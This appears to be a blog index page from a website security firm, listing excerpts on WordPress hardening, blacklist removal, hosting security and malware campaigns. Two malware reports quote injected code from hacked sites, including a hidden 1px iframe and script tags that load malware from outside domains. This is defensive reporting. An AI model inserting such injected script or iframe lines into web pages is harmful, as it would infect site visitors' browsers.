We often write posts that give you advice and recommendations around how to harden your websites, and have only recently begun to give advice on ways to navigate your backend and remove infections via terminal. But what about all the basics? That’s what I want to cover in this post. All those things that you should know [...]
How To: Lock Your Site by Enabling a Second Layer of Authentication
I put together a post this weekend about my personal experience installing a WordPress site on a clean server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication. That got me thinking about putting together this post which will [...]
How To: Stop The Hacker By Hardening WordPress
Every day we service 100s of clients and the question is always asked: “How do you stop these hackers!!!” Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape. This [...]
How To: Remove McAfee SiteAdvisor Blacklisting
As more and more blacklisting authorities come online it becomes important to understand how to go about submitting your site for a review. The most recent challenge has been figuring out how to go about getting a site off the McAfee SiteAdvisor solution. You can read more about what SiteAdvisor is here: http://www.siteadvisor.com/howitworks/index.html What’s really [...]
Partnerships: Sucuri & ClickHOST.com
Since April 2012, ClickHOST.com and Sucuri have been enjoying a symbiotic relationship. The two partnered in an attempt to offer cost-effective services to their clients. The family team at ClickHOST.com has recognized the need to get ahead of the web malware problem and understands that it’s not OK to simply shut down a site or [...]
How To: Enhance User Security with Dreamhost
If you are using DreamHost, we recommend a few options to increase the security of your sites in their environment. Enhanced User Security: It adds a few security restrictions per site/account to minimize the chances of attacks from other users on the same shared server. Configure a different user account per site: There is also [...]
New Malware – sweepstakesandcontestsnow.com
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with malware from sweepstakesandcontestsnow.com. This is what gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
We are often asked what were the top domains distributing malware or what threats we see more often on our security scanner. For the month of August, things were very similar to the previous ones, with a slight increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]
After the clean up. What to do after your site is fixed.
If you are reading this page then you are on your way to being proactive and actively taking steps to help reduce the risk of reinfection. While no one can promise you the risk will ever be zero, we can work together to ensure that it’s as low as possible. Will this guarantee I won’t get [...]
Malware iframes from .co.be, .biz.ua and chadon.nl
We are seeing many sites infected with malware getting loaded from the “.co.be” and “.ua” domains. This is what shows up in a hacked site: <iframe width="1px" height="1px" src="http://ewloidydytgba.co.be/forum.php?tp=c1f00d62cc7.. <script type="text/javascript" src="http://promelit.biz.ua/facebook.php".. Or similar code. Many of them have the filename “facebook.php” or “forum.php” to try to look like a legitimate link. Some other domains [...]